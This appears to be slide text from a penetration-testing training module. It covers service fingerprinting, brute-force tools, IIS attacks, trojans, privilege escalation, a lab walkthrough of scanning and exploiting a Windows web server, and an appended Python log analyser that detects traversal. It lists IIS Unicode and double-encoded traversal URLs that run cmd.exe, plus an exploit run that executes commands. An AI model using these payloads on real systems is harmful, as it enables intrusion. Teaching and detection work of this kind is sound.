System Hacking
Section 4 (5/25/2017)

Outline
• Service identification
• Vulnerability identification and research
• Exploits
• Putting it all together
• Target selection in large networks
• Using automated tools

Section 4.1: Service Identification

Service identification
• Common ports
• Banners
• Fingerprinting

Connecting to ports
• Telnet or netcat is the best way to connect to ports
• Many services may be accessed directly

Common ports
Many services can be identified by their common port numbers.

(Screenshot slides: Zone-h.org, Alldas.de)

Banners
Some services may be better identified by their banners:
• telnet on routers (ports 2001, 4001, 6001)
• Web daemons for applications
  – Compaq Insight Manager
  – Many systems include web configuration interfaces
(Screenshot slide: Banners)

Fingerprinting
Some services cannot be clearly identified just by connecting to them:
• Netbus on NT uses the same port as an RPC service on Solaris
• Some database connections do not provide an automatic response
Fingerprinting a service may identify what it is, even if it has moved ports.
(Screenshot slide: Fingerprinting)

Section 4.2: Vulnerability Research

Vulnerability identification and research
• This is the process of mapping the identified security attributes of a system or application to potential vulnerabilities.
Several methods to map vulnerabilities:
1. Manually map identified systems against publicly available databases such as www.securityfocus.com, www.cert.org and vendor security alerts
2. Use public exploit code posted to security mailing lists or hacker websites, or write your own code
3. Use automated vulnerability scanning tools such as Nessus, ISS or whisker
(Screenshot slide: Vulnerability research)

Lab
• Explore the following security sites to identify what vulnerability information would be of use to you for the services you have identified.
  – www.securityfocus.com
  – General searches on google.com
  – www.packetstormsecurity.com
  – www.astalavista.box.sk
  – www.securiteam.com
Time: 30 minutes

Section 4.3: Exploits

Types of exploits
• Remote exploits
• Trojans
• Privilege escalation

Section 4.3.1: Remote Exploits

Remote exploits
A 'remote exploit' attempts to gain access across the network without proper authentication. Examples:
• Brute force authentication attempts
• Attacks bypassing integrity checkers
• Buffer overflows
• Sniffing (to some extent)

Brute force attacks
Most common services attacked:
1. Telnet
2. FTP
3. "R" commands
4. Secure Shell
5. SNMP community names
6. Post Office Protocol (POP)
7. HyperText Transport Protocol (HTTP/HTTPS)
8. SMB

Common tools used
• Brutus
• Admsnmp
• Admsmb
• TeeNet
• Pwscan.pl
• Thc_hydra

Remote password guessing
• Attempting to connect to an enumerated share (such as ADMIN$ or C$) and trying username/password combinations until one works
• A "null session" can be established with the target to obtain valid account names
• Use an automated password guessing tool to brute force the selected shares

Brute force attacks under Windows
• Some common services prone to brute force:
  – Web
  – Netbios
  – FTP
(Screenshot slide: Legion)

Brute force attacks under Unix
• Some common services prone to brute force:
  – telnet
  – SSH
  – Web
  – FTP
  – R-commands

Lab
• Use a Netbios scanning tool to identify local shares on this network
• Use a brute force tool to attempt access to an account on 10.0.1.120
• Warning! These tools can produce significant traffic and lock accounts.
Time: 30 minutes

Buffer overflow attacks
(Full workshop on buffer overflows available from LOUD-FAT-BLOKE)
• Stack overflows
• Format string overflows
• Heap overflows
• Overflows subverting the control path
• Occurs when a user or process attempts to place more data into a buffer than was originally allocated
• Commonly associated with C functions like strcpy(), strcat(), sprintf() etc.
• Most frequently found when user input is taken and passed into an application

Windows buffer overflows
• Only a few conditions have been revealed to date
• All of them exploited flaws in application programs
• Very common for DoS attacks
Exploits:
1. Netmeeting 2.x by Cult of the Dead Cow
2. NT RAS by Cerberus Information Security
3. Winhlp32 by Cerberus Information Security
4. IISHack by eEye
5. Oracle Web Listener 4.0 by CIS
6. Outlook GMT token overrun by Underground Security Systems Research
7. IIS .printer

Unix buffer overflows
• Sadmind
• ftp
• Ssh
• nfs

Unexpected input
• Bypassing integrity checks
• Gaining access by providing unexpected input
  – IIS unicode
  – Web applications

Format string attacks
• Caused by programming errors in the formatted output family of functions, which includes printf() and sprintf()
• Efforts usually focused on SUID root programs

Input validation attacks
• Occurs when a program fails to recognise syntactically incorrect input
• Occurs when a module accepts extraneous input
• Occurs when a module fails to handle missing input fields
• A field-value correlation error occurs
• Common in web applications

IIS vulnerabilities
• Unicode and URL based attacks
• Special tags in HTTP
• Sample scripts to brute force

IIS hacking
• /scripts/root.exe?/c+dir
• /MSADC/root.exe?/c+dir
• /c/winnt/system32/cmd.exe?/c+dir
• /d/winnt/system32/cmd.exe?/c+dir
• /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
• /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
• /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
• /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
• /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
• /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
• /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
• /scripts/..%252f../winnt/system32/cmd.exe?/c+dir

Lab
• Use the provided URLs to roam the filesystem of 10.0.1.120
• What is accessible and what is not?
Time: 10 minutes

Section 4.3.2: Trojan Horses and Backdoors

Windows trojans and backdoors
These programs provide unauthorised access to a system without the user's knowledge:
• Theef
• CDC BackOrifice
• SubSeven
• Moosucker
A great site: http://www.tlsecurity.net
(Screenshot slide: Tlsecurity.net)

Section 4.3.3: Privilege Escalation

Privilege escalation
• Attack used to move from normal user to superuser
• Quest for Administrator
• Quest for root

Quest for Administrator
• Hoovering information
• Getadmin
• Sechole
• Spoofing LPC Port requests

Hoovering information
• Identify further information that will gain higher privileges
• Srvinfo
• Find utility
• regdmp

Getadmin
• Windows NT 4
• Small program written by Konstantin Sobolev
• Adds users to the local admin group
• Hijacks a process called winlogon
• Patched by NT SP3

Sechole
• Similar functionality to getadmin
• Modifies instructions in the memory of the OpenProcess API
• Possible to launch remotely if IIS is running
• Patched by NT SP6a

Spoofing LPC Port Requests
• Vulnerability identified by The RAZOR Team at http://razor.bindview.com
• The code takes advantage of a flaw in one function of the Local Procedure Call (LPC) Ports API

Quest for root
• Local buffer overflow
• Symlink
• File descriptor attacks
• Signal handling
• Core-file manipulation
• Shared libraries
• Kernel flaws
• System misconfiguration
• IFS attacks

Local buffer overflow
• Mostly used to exploit SUID root programs
• May add a username to the password file

Section 4.3.4: Sniffing

Sniffing
• Sniffing works by setting a network card to 'promiscuous mode'
• Sniffing only works on traffic travelling across the local network
• Sniffing is greatly complicated by network switches

Windows password sniffing
• Can use any ordinary packet analyser
• Or use a specialised tool such as l0phtcrack
• Some susceptible services:
  – Netbios
  – FTP
  – Web (especially cookies)
(Screenshot slide: Windows password sniffing)

Unix password sniffing
• Can use any ordinary packet analyser
• But Unix has some great sniffers such as dsniff
• Many Unix programs send passwords in clear text
• Some susceptible services:
  – Telnet
  – FTP
  – Web

dsniff
• Netbios
• ftp
• telnet
• R-commands
• http
• Instant messaging
• And much, much more!

Section 4.4: NT services

(Screenshot slide: Common NT services)

Profile: Netbios
• Ports 135-139
• Susceptible to sniffing, brute force
• Scanners available to search for shares
• Can give access to the system registry
• Normally blocked at routers due to broadcast

Profile: Web
• Port: 80, or any for special apps
• Common servers: Apache, Oracle, IIS, Cold Fusion
• Very susceptible to DoS attacks
• Often gives read access to all files
• IIS vulnerabilities are legendary

Profile: SMTP
• Port: 25
• Very susceptible to mail relay
• Not a lot else

Profile: FTP
• Port: 21
• Part of the IIS distribution
• Some vulnerabilities but not a large target

Profile: databases
• Ports: 1433, 1510, 1725
• MSSql is a good internal network target
• MS and Oracle often set with default passwords
• "SQL injection" a favourite for web hackers

Section 4.5: Unix services

Profile: SNMP
• Port: 160, 161 UDP
• SNMP has two default passwords: public, private
• Tools such as snmpwalk are good for enumerating entries

Profile: TFTP
• Port: 69
• Typically used to boot diskless workstations or network devices such as routers
• No username or password
• Good for sending files around from hacked systems

Profile: FTP
• Ports: 20, 21
• Allows upload and download of files from a remote system
• Many FTP servers allow anonymous access
• May be vulnerable to buffer overflow
• Can also be used for bounce attacks

Profile: Sendmail
• Port: 25
• Mail transfer agent used on many Unix systems
• Can be used to identify accounts via the vrfy and expn commands
• Some versions are susceptible to denial of service and buffer overflows
• Long list of vulnerabilities

Profile: RPC
• Remote Procedure Call
• Allows a program on one computer to execute code on a remote system

Profile: Web
• Port: 80
• Apache is most common
• Not as many attacks as IIS
• Always check URLs for embedded commands

Section 4.6: Identifying targets in large networks

Target selection
• Scan for specific services
  – Database (MS, Oracle, Sybase)
  – Web
  – RPC
  – R-commands
• View Netbios browse lists to make way to PDC/server
• View Netbios browse lists to identify treasury, etc.

Section 4.8: Automated vulnerability scanning tools

Example automated applications
• Grinder
• SiteScan
• Whisker
• Twwscan
• Nessus
• Elza (scriptable web client)
(Screenshot slides: whisker, Nessus)

Conclusion
• Hackers often search for specific known vulnerabilities and avoid well-secured systems
• Free tools make it simple to gain unauthorised access to some systems
• Tools such as Nessus should be used by every security professional

Section 4.7: Putting it all together

Our configuration for today
For the purpose of the presentation we will not perform our tests over the internet, but we won't cheat by cutting out the firewall.
• Webserver: internal 10.0.1.120, external 10.0.0.120, TCP 80 only
• Router: 10.0.0.1 (Internet side)
• Firewall: 10.0.0.125 / 10.0.1.125

(Screenshot slide: Network Penetration Tests)

Identifying the firewall: strategy
• Identify the Web or Mail server
• Get the next hop before this
  – This will probably be the perimeter router or the firewall
  – Firewall-1 & NetScreen appear as a hop
  – PIX does not appear as a hop (flattens the network)
  – 80% chance that it will be NetScreen, PIX or Firewall-1
• To figure out which:
  – ICMP (i.e. Address Mask Request, response headers)
  – Use TCP stack fingerprinting
  – Key ports (258, 259 and 263 could be Firewall-1)
  – IPSEC
  BUT luckily these days the tools are pre-written

Identifying the firewall: traceroute
    [root@wireless root]# traceroute 10.0.0.120
    traceroute to 10.0.0.120 (10.0.0.120), 30 hops max, 38 byte packets
     1  * * *
     2  * *
Slide callouts: UDP is being blocked; we need another tool.

Identifying the firewall: LFT
    # lft -vv -E -n 10.0.0.120
    Looks like we made it. Everyone responded. Will finish
    Moving on... Concluding with 2 hops.
    LFT trace to 10.0.0.120:80/tcp
    **[4.2 BSD bug]next gateway may errantly reply with reused TTLs
    **[4.2 BSD bug]next gateway may errantly reply with reused TTLs
     1  [target] 10.0.0.120:80 6.5ms
     2  [target] 10.0.0.120:80 1.6ms
Slide callouts: two TTLs suggest something between us, a firewall perhaps. Could also use MPTraceroute.

Accessible hosts: sweep for the firewall
    # nmap -sP -n 10.0.0.*
    Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
    Host (10.0.0.120) appears to be up.
    Host (10.0.0.121) appears to be down.
    Host (10.0.0.122) appears to be down.
    Host (10.0.0.123) appears to be down.
    Host (10.0.0.124) appears to be down.
    Host (10.0.0.125) appears to be up.
    Host (10.0.0.255) appears to be down.
    Nmap run completed -- 256 IP addresses (2 hosts up) scanned in 35 seconds
Slide callouts: "Our web server" (10.0.0.120) and "Who's this?" (the second host that is up).

Identifying the perimeter: ike-scan
    # ike-scan -v 10.0.0.125
    Starting ike-scan 1.6 with 1 hosts
    --- Pass 1 of 3 completed
    --- Pass 2 of 3 completed
    --- Pass 3 of 3 completed
    Ending ike-scan 1.6: 1 hosts scanned in 22.595 seconds (0.04 hosts/sec). 0 returned handshake; 0 returned notify

Identifying the firewall: ping
    # ping 10.0.0.120
    PING 10.0.0.120 : 56(84) bytes of data.
    64 bytes from 10.0.0.120: icmp_seq=1 ttl=128 time=0.280 ms
    --- 10.0.0.120 ping statistics ---
    2 packets transmitted, 2 received, 0% loss
Slide callout on ttl=128: "Windows !!"
    # ping -v -R 10.0.0.120
    PING 10.0.0.120 : 56(124) bytes of data.
    --- 10.0.0.120 ping statistics ---
    6 packets transmitted, 0 received, 100% loss
Slide callouts: "With low level packet inspection", "I think not!!"

Identifying the firewall: ICMP processing
    # ping -v -T tsandaddr 10.0.0.120
    PING 10.0.0.120 (10.0.0.120) from 10.0.0.1 : 56(124) bytes of data.
    --- 10.0.0.120 ping statistics ---
    16 packets transmitted, 0 received, 100% loss
    # ping -v -T tsandaddr 10.0.0.125
    PING 10.0.0.125 (10.0.0.125) from 10.0.0.1 : 56(124) bytes of data.
    --- 10.0.0.125 ping statistics ---
    8 packets transmitted, 0 received, 100% loss

Identifying the firewall: conclusion
• We suspect there is a firewall
  – We know the web server is Windows
  – But Windows is not normally capable of manipulating packets to this extent
  – We are fairly sure that it isn't Firewall-1
Let's see if we can hack into the servers.

Hacking the other address: 10.0.0.125

Scanning 10.0.0.125
    # nmap -sS -n -p 1-10000 10.0.0.125
    Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
    All 10000 scanned ports on 10.0.0.125 are: filtered
    Nmap run completed -- 1 IP address (1 host up)
    # nmap -sU -n -p 1-10000 10.0.0.125
    Starting nmap 3.48 ( http://www.insecure.org/nmap/ )
    All 10000 scanned ports on 10.0.0.125 are: filtered
    Nmap run completed -- 1 IP address (1 host up)
Slide callout: nothing to hack.

Hacking the web server
– Scan TCP ports
– Scan UDP ports (only HTTP or HTTPS ports should be visible!)
– Run a CGI scanner (e.g. Whisker, Crazymad or Nikto) to look for web server exploits
– Check scanner results
– Identify exploits

Hacking the web server: scan UDP ports
    # nmap -sU -n -p 1-10000 10.0.0.120
    Starting nmap 3.48
    All 10000 scanned ports on 10.0.0.120 are: filtered
    Nmap run completed -- 1 IP address (1 host up) scanned in 623.296 seconds
Slide callout: nothing to hack.

Hacking the web server: scan TCP ports
    # nmap -sS -n -O -p 1-1024 10.0.0.120
    Interesting ports on 10.0.0.120:
    (The 1023 ports scanned but not shown below are in state: filtered)
    PORT   STATE SERVICE
    80/tcp open  http
    Running (JUST GUESSING) : Cisco pix os 6.X (88%)
    Aggressive OS guesses: Cisco PIX 501 running 6.x
    No exact OS matches for host.
Slide callouts: "HTTP: the only port to hack" and, on the OS guess, "Now we know".

Hacking the web server: run CGI scanner
    # ./whisker.pl -h 10.0.0.120
    -- whisker / v1.4.0 / rain forest puppy --
    = Host: 10.0.0.120
    = Server: Microsoft-IIS/4.0
    + 200 OK (IDC error): GET /scripts/samples/details.idc
    + 200 OK (IDC error): GET /scripts/samples/ctguestb.idc
    + 200 OK: HEAD /scripts/tools/newdsn.exe
    - this can be used to make DSNs, useful in use with our ODBC exploit
    - and the RDS exploit (with msadcs.dll)
    [root@wireless v1.4]# exit

(Screenshot slides: Hacking the web server, analysing CGI scanner results, three slides)

Run exploit identified by scanner
    # dsnhackII.pl -c -h 10.0.0.120
    NewDSN exploit v 1.3 -- Scrippie / Phreak.nl
    * [Checking for necessary files] *
    Checking for: newdsn.exe -- Found :)
    Checking for: ctguestb.idc -- Found :)
    Checking for: details.idc -- Found :)
    * Now trying to create "Web SQL" DSN... <success> *
    Initializing GuestBook by GETting ctguestb.idc
    Type the command line you want to run (cmd /c assumed): cmd /c dir >> ..\hamster
    * Now trying to execute command... <success> *
    [root@wireless root]#

Lab
• Attack the systems provided and attempt to get command line access to NT
Time: 45 minutes
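Every request in this section, from the Unicode and double-encoded traversal URLs of the IIS hacking slide to the sample scripts that whisker finds and dsnhackII depends on, is recorded in the web server's own log, so the defender's counterpart to the walkthrough is log review. The code below is an added example, not course material: it normalises a request's uri-stem the way an over-permissive IIS would (the lenient-UTF-8 decoding model is an assumption based on the public description of the bug) and flags requests that climb above the web root or touch those files, run here over constructed sample log lines.

```python
# Added example (not course code): decode request paths like an over-permissive
# IIS would, then flag traversal and the probe files seen in this section.
import re

def percent_decode_once(s):
    # One %XX round; decoded bytes become latin-1 chars, so a decoded '%' (from
    # %25) is visible to a second round: the %255c trick
    return re.sub(r"%([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)

def lenient_utf8(s):
    # Assumed model of the IIS Unicode bug: the 2-byte UTF-8 formula applied to
    # a C0-DF lead byte and ANY following byte, without the overlong and
    # continuation-byte checks, so C0 AF -> '/', C1 1C and C1 9C -> '\'
    def fold(m):
        lead, nxt = m.group(0)
        return chr(((ord(lead) & 0x1F) << 6) | (ord(nxt) & 0x3F))
    return re.sub(r"[\xC0-\xDF].", fold, s, flags=re.S)

# Files the whisker run and the newdsn exploit above rely on, plus the shells
WATCHED = {"cmd.exe", "root.exe", "newdsn.exe", "details.idc", "ctguestb.idc"}

def analyse(uri_stem):
    # Two decode rounds before the check, as the vulnerable IIS versions did
    path = lenient_utf8(percent_decode_once(percent_decode_once(uri_stem)))
    segments = path.replace("\\", "/").split("/")
    depth, escaped = 0, False
    for seg in segments:
        if seg == "..":
            depth -= 1
            escaped = escaped or depth < 0   # climbed above the web root
        elif seg not in ("", "."):
            depth += 1
    return {"path": path, "traversal": escaped,
            "watched": segments[-1].lower() in WATCHED}

# Constructed sample log lines: client, method, uri-stem, uri-query
SAMPLE_LOG = [
    "10.0.0.1 GET /default.htm -",
    "10.0.0.1 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir",
    "10.0.0.1 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir",
    "10.0.0.1 GET /scripts/samples/ctguestb.idc -",
]

def suspicious_requests(lines):
    hits = []
    for line in lines:
        client, _method, stem, _query = line.split(" ", 3)
        r = analyse(stem)
        if r["traversal"] or r["watched"]:
            hits.append((client, stem, r["path"]))
    return hits
```

The decode-before-check order is the point: a filter that inspects the raw uri-stem misses every variant in the slide's list, while normalising first catches all of them with one depth counter.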